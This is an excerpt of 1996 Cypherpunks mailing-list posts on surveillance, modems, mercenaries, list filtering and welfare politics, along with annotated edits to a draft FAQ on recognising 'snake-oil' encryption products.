is not a True Name, who has fallen behind in child support payments, who is late on his income taxes, and so on. It doesn't matter if cash is still allowed if one cannot interact with any health care person without a proper citizen-unit data base entry. They've got you tracked even if you pay in gold dust. (Putting on my Duncan cap--not to be confused with dunce cap--I wonder what will happen the first time someone dies because a hospital wouldn't treat someone without a proper citizen-unit health care card?) P.S. 
I fully understand that some doctors will treat patients for cash, without reporting to The Authorities, just as some doctors will treat gunshot wounds without the mandatory reporting of same to the police. This does not mean such doctors will be easy to find. The System, if allowed to win, will win. P.P.S. Many of the things we talk about on the list are being made possible--the good and the bad--by computerization. Obviously. Burnham's "Age of Privacy" (or maybe it was "The Age of Surveillance"--my copy is not handy) made this point many years ago. We are taking the mechanization and systematization procedures the Germans used so efficiently in the 1930s and modernizing them, with every movement and every transaction tracked and recorded in data bases. Now more than ever we need "credentials without identity" and digital cash. Chaum's article about "Transaction Systems to Make Big Brother Obsolete" is now more urgent than ever. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From Adamsc at io-online.com Wed Sep 18 16:55:00 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 07:55:00 +0800 Subject: 56 kbps modems Message-ID: <19960918160153703.AAH88@IO-ONLINE.COM> On Mon, 16 Sep 1996 12:16:08 +0200, Gary Howland wrote: >craigw at dg.ce.com.au wrote: >> well here in Australia Telstra our national carrier only "guarantees" >> 2400 baud to work. >As I am sure has been discussed at length before, baud does not equal >bps. AFAIK, V32bis is only 2400baud. This is correct. 
The difference is in the number of values for each of the 2400 signals sent per second. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From tcmay at got.net Wed Sep 18 17:05:25 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 08:05:25 +0800 Subject: Mercenaries Message-ID: At 9:40 PM 9/17/96, William Knowles wrote: >On Tue, 17 Sep 1996, Michelle Thompson wrote: > >> Interesting information from a friend of mine- >> >> >An american can not serve for pay for a position in another military >> >that could be filled by local populace. I may have my jurisdiction >> >wrong tho, this could be an international law not a US law. >> >Basically, you can't go be a grunt or an assassin in another country, >> >because they can find their own, As to Michelle's point that Americans cannot serve for pay in other militaries, there are all sorts of waivers and "look the other way"s involved. For example, the retired American officer who became the top military man in Estonia (or one of the Baltic States)--while still retaining his U.S. citizenship. >What about the French Foreign Legion? or the Volunteers for Israel, >which isn't really a fighting force, but Americans can help keep >the Israeli army at a ready state. Israel is one of several states which the U.S. allows dual citizenship with. For political reasons, because of America's extermination of the Jews in WW II (Whoops, we were on the other side...so why do we have such a cozy deal with Israel, but not with, say, France? Beats me. Politics.) 
Brian Davis, our former Prosecutor, can tell us how likely it is that any person would be charged and brought to trial for being a paid mercenary for some small country in the Third World. The CIA is often behind such mercenaries, so national security issues could make the issue murky. But the real reason such prosecutions are rare is that the government realizes how Orwellian it sounds to say: "You are being prosecuted because you were a mercenary for Oceania in its war with Eastasia. While Oceania was once our ally in our battle with Eastasia, and we endorsed and financed your role as a mercenary, we became allies with our great friend Eastasia and are now in a state of war with the tyrants of Oceania." >Explicit isn't a dirty word, Or is it? AOL has declared "explicit" to be a Banned Word, along with "pissant," "craps," and "cock," and numerous other such ordinary words. (So much for mentioning their pissant policies, a game of craps in Las Vegas, or a male chicken.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From perry at piermont.com Wed Sep 18 17:09:34 1996 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 19 Sep 1996 08:09:34 +0800 Subject: a simple cypher scheme In-Reply-To: <9609180005.AA14720@ns.tsinet.com> Message-ID: <199609181641.MAA14118@jekyll.piermont.com> stuart johnson writes: > a co-worker here has > come up with a 'cypher' scheme that he would like to use to send code to our > clients. 
the scheme is this : he would take the file of code and pad all > lines to the length of the longest line, he would then perform column swaps, > and then row swaps, to 'mix up' the file. the person receiving the file > would then perform the opposite functions to recover the file. it seems so > simple that it can't be good. i've convinced him to use pgp, but i would > like some input if possible on why his cypher scheme is not a good one. This is a variant on a scheme called a transposition cipher. It was okay, but not very good, technology in the Civil War, when it was last seriously used. It can be broken with a technique called multiple anagramming. Perry From Adamsc at io-online.com Wed Sep 18 17:14:48 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:14:48 +0800 Subject: 56 kbps modems Message-ID: <19960918160153703.AAG88@IO-ONLINE.COM> On Sun, 15 Sep 1996 23:35:38 -0700 (PDT), Lucky Green wrote: >Seriously, how many of the 28.8 modem users get connections at 28.8? >Twenty percent? Fifty percent? Today's modems are already faster than >most analog lines can support. More likely than not, a 56k modem won't >link up at 56k. If you want speed, use the clean solution. Get ISDN. >[And don't buy the Motorola BitSurfer PRO. It won't work with two line >phones. The sound is so bad, you can't use the POTS you pull out for >business. Motorola: "We are aware of the problem". Well, they have been >aware of it since at least February.] Interesting. . . Oh well, I bet their competition doesn't mind. >But for data, home ISDN is the way to go. Of course, we'll be getting the cable modems around here by early next year, so I might just wait for that 15MB/s. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. 
And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Wed Sep 18 17:20:14 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:20:14 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960918160153703.AAF88@IO-ONLINE.COM> On Mon, 16 Sep 1996 07:37:17 +0200 (MET DST), Anonymous wrote: >> The thing about _traditional_ charity, of the religious or community sort, >> was that it was not treated as an "entitlement," as something the resentful >> masses could "demand" as part of their "human rights." > There's no substantial difference between their resentful whining about >their rights and your resentful whining about your rights - except maybe >that you whine more. Last time I checked, tcmay has never insisted that it is his right to have something I worked for. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Wed Sep 18 17:33:36 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:33:36 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960918160153703.AAD88@IO-ONLINE.COM> On Sun, 15 Sep 96 23:43:33 +0000, attila wrote: > forget the idea that it will build a community --unless > you wish to consider the Bitch's "It Takes a Global > Village" a community. Statist from the cradle; welcome She's right about that, to some extent. It often does take a village to raise a child. What she doesn't mention is that the governmental policies she lobbies for are doing their best to destroy that village. Name one example where wealth-transfers have made people more willing to spread their now vastly reduced resources to the needy? 
As a sidenote, does anyone know how much of the money taken out in taxes actually goes toward useful things? i.e. maintaining infrastructure like roads, providing for the public defense, paying police (most of whom I've found are great people. It's the higherups who seem to have ODed something), forest service, etc? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Wed Sep 18 17:36:37 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:36:37 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960918160153703.AAE88@IO-ONLINE.COM> On Sun, 15 Sep 1996 17:13:53 -0700, Dale Thorn wrote: >> And that's good. The world population really should go back to around >> 1 billion for achieving a stable ecology (with singing birds for >> the peace of minds). The former (?) US system of encouraging young >> standalone women to make babies to get benefits was very bad. The >> Chinese system - less benefits the more children you have - is the >> way to go. >Just a comment: "The world population really should go back to around >one billion", etc. And how could we achieve that without severe govt. >oppression, one wonders? Now, I've heard of "education" being used to >help the masses learn to be responsible citizens ad nauseam, but since >education is pretty much just propaganda in the massively-capitalist >system now taking over even the P.R. of China, how the heck is education >going to work? Well, they're much better at telling kids how to use condoms than they are at, say, explaining an integral. 
(or even an equation for that matter) As a side note, how about some real welfare reform: mandatory birth control (and pay for that; it's *much* cheaper) and benefits go DOWN for additional births. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From hallam at vesuvius.ai.mit.edu Wed Sep 18 17:43:24 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Thu, 19 Sep 1996 08:43:24 +0800 Subject: Spam blacklist project In-Reply-To: Message-ID: <9609182121.AA13495@vesuvius.ai.mit.edu> Not impressed by their setup, there does not seem to be any checking to see if the mail address is correct (i.e. to check for a denial of service attack) and the setup requires distributors to submit their list for "washing". That type of setup may be OK for the bush league but it's hardly cypherpunk type stuff. It's fairly easy to set up a scheme in which the blacklist can be distributed with no risk to the subscribers. Simply use SHA digests and so on. I hadn't checked on Yahoo, I tend to use Alta-Vista having found Yahoo somewhat arbitrary in category definition. Phill PS Sites that use red text on a white background ... ugh!!! From ericm at lne.com Wed Sep 18 17:47:46 1996 From: ericm at lne.com (Eric Murray) Date: Thu, 19 Sep 1996 08:47:46 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: Message-ID: <199609181601.JAA28161@slack.lne.com> Chip Mefford writes: > > > As much as it shames me, I have recently discovered that by filtering > messages from only 2 participants and setting body filters on 3 keywords > have remarkably improved the usefulness of this listserve. Out of curiosity, what are those keywords? 
> As much as I do enjoy some of the filtered subject matter, I really feel it > is very off subject and makes this listserver useless for the intended task. > > I guess that makes me a censor and it has me reexamining some things. No, filtering your mail does NOT make you a censor, unless you're filtering the mail before it is gatewayed to a list or newsgroup where other people read it. And they didn't ask you to do the filtering. Filtering your own mail is akin to choosing which articles in a magazine to read. It's not censorship if you don't read an article; it's the article's author's fault that he didn't make the article interesting enough for you to read. I think that anyone who has to work for a living must filter the cypherpunks list in order to cut out some of the crap. Most people just don't have the time to wade through everything, and filtering some of it out is a good start on upping the S/N ratio. What you consider Signal and Noise however is entirely up to you. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From tcmay at got.net Wed Sep 18 18:03:17 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 09:03:17 +0800 Subject: cypherpunk listserve usefulness Message-ID: At 2:33 PM 9/18/96, Chip Mefford wrote: >As much as it shames me, I have recently discovered that by filtering >messages from only 2 participants and setting body filters on 3 keywords >have remarkably improved the usefulness of this listserve. > >As much as I do enjoy some of the filtered subject matter, I really feel it >is very off subject and makes this listserver useless for the intended task. > >I guess that makes me a censor and it has me reexamining some things. No, it certainly does not make you a "censor." It makes you more _discriminating_, but this is often a good thing. 
A _censor_, by all standard definitions one can find, is one who restricts what _others_ may read. The form that concerns many of us the most is when a government uses its monopoly on force to censor. (But the term can also apply to when churches or corporations act as censors of what worshipper-units or employee-units may read or view.) I hope by "has me reexamining things" you do not mean that your experience with filters means support for government telling us all which filters we must use. Certainly the CP list is undergoing one of its periodic "sunspot cycles," where spambots and loonies are attempting to trash it, and where the discussions of meaty issues are being affected. We've survived half a dozen or so such periods, and will survive this. The best way to increase the S/N ratio is to post more signal. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From geeman at best.com Wed Sep 18 18:06:13 1996 From: geeman at best.com (geeman at best.com) Date: Thu, 19 Sep 1996 09:06:13 +0800 Subject: Snakeoil FAQ edits/comments Message-ID: <01BBA534.F29A46E0@geeman.vip.best.com> Matt: Thanks, and good work. My comments are indicated by [your text] in brackets, my comments >>> set off by >>>'s. 
To help separate, look for "-----------------------------"

--------------------------- snake-oil-faq ----------------------------

Snake-Oil Warning Signs
Encryption Software to Avoid

$Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $

Distribution

Please do not distribute this beyond the circles of cryptographic competence yet. This is an incomplete work-in-progress. Feedback is greatly appreciated.

The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, and comp.infosystems. We're targeting those who have influence over or direct involvement in the purchasing decisions of computer security software and equipment in the corporate and academic worlds, as well as individual users who wish to assert their privacy through the use of good cryptography.

-----------------------------
>>> I wonder what a good assumption is about level-of-expertise. I should think rather low, since a more experienced person will not be in as much need of the doc in the first place. Think moderately-informed user: like the readers of InfoWorld, eh? Given that, there are several places where knowledge of the subject is assumed that the real consumer of the FAQ doesn't have.
-----------------------------

Disclaimer

All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves, based on our own experiences, etc., etc., etc.

This is a general guideline, and as such, cannot be the sole metric by which a security product is rated, since there can be exceptions to any of these rules.

-----------------------------
>>> Actually, I think there are some rules in here that there are no exceptions to. Check; nothing comes immediately to mind tho.
-----------------------------
-----------------------------
[(But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil. ]
>>> But if many of the items on the "Things to look out for" list seem to apply to a product, the product is very likely weak.
-----------------------------
-----------------------------
From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some [braindead] marketing technique, so be aware of exceptions.
>>> "Braindead", eh, hmmmmm. Too dignified ;)
-----------------------------

Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, C Matthew Curtin

Introduction

Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail to do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security.

-----------------------------
>>> They also prey on the inexperience of the consumer, rely on the mystery and mystique of mathematical-sounding jargon, to make poorly engineered products seem to be something they are not.
-----------------------------

Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is >>> to <<< present some obvious "red flags" [so that] >>> which <<< people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing.

For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil".
When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that [supports strong encryption? ]
-----------------------------
>>> Problem: what is "Strong Encryption" ??? From a user's point of view this term is too fuzzy. Try: "that will keep data secure from your kid sister? A rogue government? For 5 minutes? Etc. etc. "
-----------------------------
-----------------------------
[An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? Do you need on-the-fly (automatic) encryption and decryption, or are you willing to select when and which files you want encrypted? ]
>>> I'd leave that out: not pertinent to snake-oil vs. Good Stuff, but is about the kind of application user requires.

How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years?
>>> see above.
-----------------------------
-----------------------------
[Different products will serve different needs, and it's rare that a product will serve every need. (Sometimes a product won't be needed: it may be better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end than to use a separate encrypted utility in some cases.)]
>>> I don't understand: "sometimes a product won't be needed?" I think this paragraph could be left out. After all, OS utility or Snoop-Dooper-Doggy-Doo-Ware product, ya still gotta know what you're doing, right? So everything in the FAQ still applies; or maybe I'm missing the point here.
-----------------------------

Some basics

The cryptography-faq (found at ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial of cryptography, and should also be consulted.
In an effort to make this FAQ more complete, some very basic topics are included below.

Conventional vs. Public Key Cryptography

-----------------------------
There are two basic types of cryptosystems: symmetric (also known as "conventional," [sometimes also called] >>> or <<< "private key") and asymmetric (public key).

Symmetric ciphers require both the sender and the recipient to have the same key. That key is [applied] >>> used by the cryptographic algorithm <<< to encrypt the data >>> originated <<< by the sender, and again by the recipient to decrypt the data.

Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses his private key to decrypt the message.

Asymmetric [cryptosystems] >>>algorithms<<< are much slower than [their symmetric counterparts.] >>> symmetric algorithms, and are almost exclusively used to encrypt short "session keys," which are then used to encrypt a message using the speedier symmetric algorithms. This use of public key cryptography is called "key exchange."
-----------------------------
-----------------------------
[Also, key sizes must be much larger.]
>>>I agree with one comment that discouraged comparing the 2 algo types.
-----------------------------

See the cryptography FAQ for a more detailed discussion of [the topic.] >>>these topics.<<<

Key Sizes

-----------------------------
Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small keysizes and increasing processor speeds [(making brute-force attacks feasible).]
>>> Again, I maintain that the audience for this stuff can't be relied upon to even know what that means.
Try: "which makes the cipher vulnerable to breaking by trying every possible key combination (called a brute-force attack)." --- or something like that.
-----------------------------

The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one.

In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay.)

Security Requirements for Different Information

Type of Traffic                                  Lifetime        Minimum [Symmetric] Key Length
Tactical military information                    minutes/hours   56-64 bits
Product announcements, mergers, interest rates   days/weeks      64 bits
Long-term business plans                         years           64 bits
Trade secrets (e.g., recipe for Coca-Cola)       decades         112 bits
H-bomb secrets                                   >40 years       128 bits
Identities of spies                              >50 years       128 bits
Personal affairs                                 >50 years       128 bits
Diplomatic embarrassments                        >65 years       at least 128 bits
U.S. Census data                                 100 years       at least 128 bits

-----------------------------
>>> Where is the attribution for the table?
-----------------------------

As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from Applied Cryptography, second edition.

Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks

Symmetric Key Length   Public-key Key Length
56 bits                384 bits
64 bits                512 bits
80 bits                768 bits
112 bits               1792 bits
128 bits               2304 bits

-----------------------------
>>> BEWARE, Danger: comparing public/private key cryptosystems again. I think if you really want to do so, then the comparison should really be explained.
-----------------------------

Some Common Snake-Oil Warning Signs

The following are some of the "red flags" one should watch for when examining an encryption product

* Technobabble

The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either.

A sign of technobabble is a description which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in the literature.

* New Type of Cryptography?

Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new break-throughs" are likely to show up in the >>> scientific <<< literature, and [many in the field] >>> professionals won't <<< [are unlikely to] trust them until after years of analysis, by which time they are not so new anymore.

Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses a different method of computation doesn't make it more secure.

-----------------------------
>>> As a matter of fact, these techniques are the subject of ongoing cryptographic research and nobody has published successful results based on their use yet.
-----------------------------

Anything that claims to have invented a new [public key] cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography, especially public key systems, is grounded in mathematical theory. The security is based on problems that are believed, if not known to be hard to solve.
-----------------------------
>>> There are some other comments in cpunks on this last bit. I defer.
-----------------------------

The strength of any encryption scheme is only proven by the test of time, >>> involving exhaustive analysis by cryptographers<<<. New crypto is like new pharmaceuticals, not new cars.

* Proprietary Algorithms

Avoid software which uses "proprietary" or "secret" algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the [academic] >>> professional and academic cryptographic <<< community, then you should be wary of trusting it. (Note that a vendor who specializes in the cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception.)

-----------------------------
>>> How can you tell a well-reputed vendor? I am thinking of one co. that promises to release their algo. details upon NDA, but at least in my case the details never showed up! This is slippery here!
-----------------------------

Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher.

The use of a trusted algorithm, >>> availability of <<< [if not with] technical notes explaining the implementation ([if not availability of] >>> and preferably <<< the source code for the product) are a sign of good faith on the part of the vendor that you can take apart and test the implementation yourself.

A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem.
(If a hypothetical 'hacker' was able to get access to your system, access to encrypted data might be the least of your problems.)

-----------------------------
>>> Add: The strength of a cryptosystem should depend ONLY on the security of the keys involved, and not the security of the algorithm.
-----------------------------

* Experienced Security Experts and Rave Reviews

Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal).

Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) take the software apart for them.

Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either.

* Unbreakability

Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims.

-----------------------------
>>> The reader is not qualified to evaluate realistic/unrealistic.
-----------------------------

No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power.

One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion.

-----------------------------
>>> Add: Avoid products that use huge numbers to impress you that it would take massive amounts of time to break them. This is ONLY true under the assumption that the only way to break the system is by exhaustively trying every possible key, and this assumption has to be proved before the claim is valid.
A cryptosystem using a keylength of 50,000 bits theoretically would take 2 raised to the 50,000th power to break (a ridiculously large number) if, AND ONLY IF the algorithm had no weaknesses. The hard part of cryptosystem design is making an algorithm with no weaknesses, such that exhaustive brute-force search is the only method of breaking it, not using long keys.
-----------------------------

* One-Time-Pads

A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. That is, snake-oil sellers will try to capitalize on the known strength of a OTP. It is important to understand that any variation in the implementation means that it is not an OTP, and has nowhere near the security of an OTP.

A OTP system is not an algorithm. It works by having a "pad" of random bits in the possession of both the sender and recipient.

-----------------------------
>>> Explain what you mean by a "pad" --- using a term which to the newbie may not usually be associated with crypto. Origin being the pads of paper that they used to use etc.etc. ???
-----------------------------
-----------------------------
The message is encrypted using [the next n bits in the pad as the key, where n is the number of bits in the message] >>> as many bits from the key as there are bits in the message. That is, for each bit in the message, there is a random bit from the one-time-pad.<<<
-----------------------------

After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad.

The vendor may confuse random session keys or initialization vectors with OTPs.
* Algorithm or product XXX is insecure

Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these.

* Keys and Passwords

The "key" and the "password" are often not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization").
>>> Other comments addressed this paragraph. I defer.

The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure.

Anything that restricts users' passwords to something like 10 or 16 or even 32 characters is foolish.

If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it.

If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product.

Convenience is nice, but be wary of anything that sounds too easy to use.

-----------------------------
>>> Instead, try: be wary of any product that overly emphasizes ease-of-use without due attention to its cryptographic strength.
-----------------------------

Avoid anything that lets anyone with your copy of the software access files, data, etc. without having to use some sort of key or passphrase.
Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy).

Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and private-key (symmetric) cryptography.

* Lost keys and passwords

If there's a third-party utility that can crack the software, avoid it.
>>> Which - the utility or the crypto?

If the vendor claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it.

If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key?

* Exportable from the USA

If the software is made in North America, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export).

If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art.

Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution.

Also note that just because software has made it outside of North America does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site.

Other Considerations

Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use).

No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly.
Do not trust any product to be foolproof, and be wary of any product that claims it is.

Contributors

The following folks have contributed to this FAQ.

Jeremey Barrett Jim Ray Robert Rothenburg Walking-Owl

References

1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996
2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available via ftp://ftp.research.att.com/dist/mab/keylength.ps

------------------------------------------------------------------------
----
C Matthew Curtin
Last modified: Mon Sep 16 09:51:41 EDT
----------------------------------------------------------------------
--
C Matthew Curtin MEGASOFT, INC Chief Scientist
I speak only for myself. Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/

From wsj-announce at interactive.wsj.com Wed Sep 18 18:17:29 1996
From: wsj-announce at interactive.wsj.com (The Wall Street Journal Interactive Edition)
Date: Thu, 19 Sep 1996 09:17:29 +0800
Subject: Interactive Edition free access ends this week
Message-ID: <2.2.32.19960917180356.0072c02c@pop.dowjones.com>

Dear Subscriber:

This Friday is the last day of your free trial subscription to The Wall Street Journal Interactive Edition. We hope you've enjoyed this extensive free period and that you will--if you haven't already--join us as a charter annual subscriber.

You don't need to re-register. Just fill out a brief online form and provide us with payment information. An annual subscription costs just $49 a year or $29 a year if you subscribe to any print edition of The Wall Street Journal.

To convert to an annual subscription, just access http://wsj.com and click on the "Convert Now" graphic.
If you do not wish to convert to an annual subscription, you do not need to do anything -- you will not be billed and your subscription will be canceled automatically at the end of the trial.

You may also be interested in a special offer available to users of Microsoft's Internet Explorer. Microsoft has made arrangements with several premier publishers on the Web, including the Interactive Edition, to offer subscriptions to Internet Explorer users at no charge through the end of this year.

If you use Internet Explorer as your Web browser, you will be able to keep reading the Interactive Edition through Dec. 31, 1996, and there is no need for you to provide us with payment information at this time. For more information on this offer, you can visit http://wsj.com/ie.html or ask us questions at the e-mail address below.

If you have questions or comments, e-mail us at the address below or call Customer Service at 1-800-369-2834 or 1-609-514-0870.

Neil Budde
Editor
The Wall Street Journal Interactive Edition
info at interactive.wsj.com

--------------------------------------------------------
The WSJ-ANNOUNCE3 list is a service of The Wall Street Journal Interactive Edition (http://wsj.com). If you no longer wish to receive messages from the WSJ-ANNOUNCE3 list, simply reply to this message and in the body of your message type: UNSUBSCRIBE WSJ-ANNOUNCE3

From Adamsc at io-online.com Wed Sep 18 18:17:55 1996
From: Adamsc at io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 09:17:55 +0800
Subject: Informal Renegotiation of the Law
Message-ID: <19960918160153703.AAC88@IO-ONLINE.COM>

On Sun, 15 Sep 1996 17:54:49 -0500 (CDT), snow wrote:

>> For example, you will not read anywhere that compulsory education laws have
>> been repealed -- but they have. When the home schooling movement started in
>> the late 1970s, there were occasional harassment and prosecution of parents.
>> The home schoolers won some and lost some. As time went on, the authorities
>> came to accept home schoolers so that at this point, legal problems are
>> rare. Compulsory education has been effectively repealed by the actions of
>> refusenicks in both the subject population and the enforcement population.
